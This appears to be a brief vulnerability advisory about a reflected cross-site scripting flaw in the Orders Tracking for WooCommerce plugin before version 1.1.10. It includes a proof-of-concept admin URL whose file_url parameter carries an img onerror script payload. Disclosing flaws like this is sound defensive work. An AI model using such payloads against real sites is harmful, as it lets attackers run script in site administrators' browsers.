Orders Tracking for WooCommerce < 1.1.10 - Reflected Cross-Site Scripting

2021-12-2700:00:00

Krzysztof Zając

woocommerce

cross-site scripting

security

EPSS

0.001

Percentile

31.7%

The plugin does not sanitise and escape the file_url before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting

https://example.com/wp-admin/admin.php?page=woo-orders-tracking-import-csv&file_url=%3Cimg+src+onerror%3Dalert%281%29%3E&vi_wot_error=2

References

plugins.trac.wordpress.org/changeset/2643807

EPSS

0.001

Percentile

31.7%

Related for WPEX-ID:DC9A5D36-7453-46A8-A17F-712449D7987D